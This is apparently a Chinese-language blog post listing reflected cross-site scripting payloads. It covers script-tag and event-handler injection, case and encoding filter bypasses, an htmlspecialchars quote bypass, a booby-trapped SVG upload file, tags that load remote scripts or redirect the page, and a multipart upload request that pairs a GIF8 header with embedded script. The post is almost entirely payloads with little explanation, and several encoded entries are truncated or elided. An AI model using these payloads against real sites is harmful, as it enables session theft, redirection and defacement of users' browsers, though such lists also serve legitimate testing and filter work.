常见的反射型XSS攻击方法

臭大佬 2021-08-19 17:28:51 347
linux 
简介 常见的反射型XSS攻击方法

常见的反射型XSS攻击方法

普通的XSS JavaScript注入

input输入合并标签
c"/><script>alert(1)</script>
文本框输入
基础测试
<script>alert(1)</script>
区分大小写
<sCRipT>alert(1)</sCrIPt>
svg标签
<svg/onload=alert(1)>
svg文件

建个11.svg文件,用于上传,内容如下:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

或者

<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>

11.svg文件,标准内容如下:

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg t="1629902091639" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg"  onload="alert(document.domain)" p-id="3724" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><defs><style type="text/css"></style></defs><path d="M738.781457 243.320134c28.197694-5.199575 52.595699 13.998855 54.695527 15.598725 28.197694 22.798136 30.297523 60.995013 31.297441 78.093614 0.399967 7.999346 0.299975 16.098684-0.299975 24.298014 2.999755-5.199575 5.799526-10.499142 8.199329-15.8987 6.999428-15.798708 31.897392-79.293516 79.093533-87.892814 12.998937-2.399804 25.19794-0.199984 35.397106 3.399722-0.699943-1.199902-1.299894-2.399804-1.999837-3.599705-17.898536-29.997547-41.196631-49.695936-49.495953-56.595373-32.997302-27.497752-46.796174-23.698062-70.694219-49.495953-21.898209-23.59807-31.397433-49.295969-35.397106-63.694791-10.599133-37.896901-4.099665-69.994277 0-84.893059-12.199003-2.399804-42.996484-6.899436-77.793639 7.09942C680.886191 22.038228 662.687679 42.336568 654.988308 52.235759c22.49816 24.09803 38.496852 46.496198 49.495953 63.694792 19.798381 30.997465 25.597907 48.496035 28.297686 63.694791 2.499796 13.898864 4.499632 24.09803 0 35.397106-4.599624 11.399068-14.598806 21.498242-28.297686 35.397106-5.799526 5.799526-11.999019 11.599052-14.098847 21.198266-0.799935 3.599706-0.899926 6.799444-0.699943 9.29924 11.599052-17.198594 27.797727-33.697245 49.095986-37.596926z" fill="#C0CA33" p-id="3725"></path><path d="M732.781947 59.335178l56.595373-56.595372c-12.199003-2.399804-42.996484-6.899436-77.793639 7.099419-26.697817 10.699125-43.896411 27.39776-52.995667 38.096885l74.193933 11.399068z" fill="#827717" p-id="3726"></path><path d="M973.362276 370.609726c-0.999918-28.49767-2.899763-68.494399-26.29785-109.591039-10.099174-3.599706-22.398169-5.799526-35.397106-3.399722-47.196141 8.699289-72.194097 72.094105-79.093533 87.892813-2.399804 5.399558-5.199575 10.699125-8.199329 15.8987C814.975226 483.600487 692.985201 621.989171 660.687842 657.386277c-31.997384 35.09713-83.293189 90.792576-164.086583 148.487859-118.690295 84.693075-235.280762 126.989616-359.370615 171.885945-6.499469 2.299812-15.998692 8.299321-27.097784 15.098765l0.199983 0.299976v21.298258c12.898945 4.299648 25.497915 5.999509 35.397106 6.999428 82.393263 8.299321 158.787016-6.299485 162.686698-7.09942 56.495381-11.199084 108.891096-21.598234 176.885536-49.495952 112.190826-46.196223 185.184858-106.791268 226.381489-141.488431 75.193852-63.494808 122.290001-122.989943 141.488431-148.587851 33.697245-44.696345 72.794048-97.59202 98.991906-176.885536 22.198185-67.194506 21.698226-112.590794 21.198267-127.289592z" fill="#FFCA28" p-id="3727"></path><path d="M824.774425 337.112465c-0.899926-17.098602-2.999755-55.39547-31.297441-78.093614-2.099828-1.699861-26.497833-20.798299-54.695527-15.598725-21.298258 3.899681-37.496934 20.398332-49.095986 37.496934 0.199984 2.499796 0.599951 4.299648 0.699943 4.799608 1.699861 8.299321 0 84.493091-70.69422 183.884964-31.397433 44.096394-66.394571 78.793557-98.69193 105.591366-38.196877 31.7974-72.594064 52.495708-92.292453 64.194751-31.497425 18.598479-41.496607 21.198267-97.792004 48.496034-23.59807 11.49906-55.295479 27.297768-100.291799 50.495871-14.198839 7.299403-62.094923 32.497343-113.190745 77.793639-27.497752 24.398005-54.395552 53.295642-63.694792 91.992478-0.699943 2.999755-1.299894 5.899518-1.699861 8.599297-1.399886 8.599297-1.599869 15.998692-1.299894 22.198185l51.795765 39.896738 7.699371 13.898864c11.099092-6.799444 20.598316-12.798953 27.097784-15.098766 124.089853-44.896329 240.780312-87.19287 359.370615-171.885945 80.793394-57.695282 132.089199-113.290736 164.086583-148.487859C692.985201 621.989171 814.975226 483.600487 824.374458 361.410478c0.699943-8.19933 0.799935-16.298667 0.399967-24.298013z" fill="#FFE082" p-id="3728"></path><path d="M110.13286 992.858846l-7.699371-13.898863-51.795765-39.896738c0.999918 6.199493 1.999836 12.498978 2.999755 18.698471v7.09942c4.699616 7.099419 9.399231 14.098847 14.098847 21.198266l7.09942 7.09942c4.899599 3.899681 9.799199 7.799362 14.79879 11.699043 2.19982 0.799935 4.299648 1.599869 6.499468 2.399804l14.098848 7.199411c0-7.199411-0.099992-14.398823-0.099992-21.598234z" fill="#5D4037" p-id="3729"></path><img src = "javascript:alert('1');"></img></svg>
重定向
<script> window.location="http://www.baidu.com"</script>
<iframe src='http://127.0.0.1/a.jpg' height='0' width='0'><iframe>
<script src='http://127.0.0.1/a.js'></script>
htmlspecialchars绕过

//使用了htmlspecialchars进行处理,是不是就没问题了呢,htmlspecialchars默认不对’处理,输入的内容被处理后输出到了input标签的value属性里面,试试:’onclick=’alert(1)’

' onclick='alert(1)'
字符编码
<script>alert(“xss”);</script>
可以转换为:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
// 使用eval
<script>eval("\61\6c\65......");<script>
空格/回车/Tab
<img src= "javascript: alert(/1/);" width=100>
利用HTML标签属性值执行XSS
<img src = "javascript:alert('1');">
事件执行
<img src=1 onerror=alert(1);>

<input type = "button"  value = "clickme" οnclick="alert('click me')" />
浏览器请求参数(必须有这个参数名,请求类型要相同)

xxx?method=<img src=1 onerror=alert(1);>

?name=<img%20src%3D1%20onerror%3Dalert%281%29%3B>
 =%22;alert%281%29;%2f%2f

?name=<meta charset="ISO-2022-JP"><img src="#" onerror%1B28B=alert(1) />

x=payload1"><svg><script>alert%26%23x28;1%26%23x29</script></svg>
IMG标签XSS使用JavaScript命令
<IMG SRC=http://xxx/XSS/xss.js/>
IMG标签无分号无引号
<IMG SRC=javascript:alert(1)>
IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(1)>
HTML编码(必须有分号)
<IMG SRC=javascript:alert(1)>
修正缺陷IMG标签
<IMG """><SCRIPT>alert(1)</SCRIPT>">
formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
嵌入式标签,将Javascript分开
<IMG SRC="jav ascript:alert(1);">
嵌入式编码标签,将Javascript分开
<IMG SRC="jav ascript:alert(1);">
嵌入式换行符
<IMG SRC="jav ascript:alert(1);">
嵌入式回车
<IMG SRC="jav ascript:alert(1);">
双开括号
<<SCRIPT>alert(1);//<</SCRIPT>
半开的HTML/JavaScript XSS
<IMG SRC="javascript:alert(1)"
双开角括号
<iframe src=http://3w.org/XSS.html <
无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
换码过滤的JavaScript
\";alert(1);//
结束Title标签
</TITLE><SCRIPT>alert(1);</SCRIPT>
节省[http:]
<A HREF="//www.google.com/">1/A>
节省[www]
<A HREF="http://google.com/">1</A>
绝对点绝对DNS
<A HREF="http://www.google.com./">1</A>
javascript链接
<A HREF="javascript:document.location='http://www.google.com/'">1</A>

上传绕过

Web应用通常会检测目标文件的文件头,并以此判断是否合法。在上传过滤函数中,一般只会检验文件头中的前四个字节。例如,下面这几个图像文件被检测的字节:

JPEG- FF D8 FF DB - ÿØÿÛ
GIF - 47494638- GIF8
PNG - 89504E 47- ‰PNG

如果要利用这点,仅需做到两点。

错误的文件扩展,上传该文件,以混淆浏览器;
添加神奇的文字头:GIF8

发送请求:

---------------------------- -6683303835495
Content-Disposition: form-data; name= "upload"; filename= "badfile.''gif"
Content-Type: image/png

GIF8
<html><script>alert(1)</script></html>
---------------------------- -6683303835495--

参考:
吕滔博客 https://lvtao.net/dev/xss.html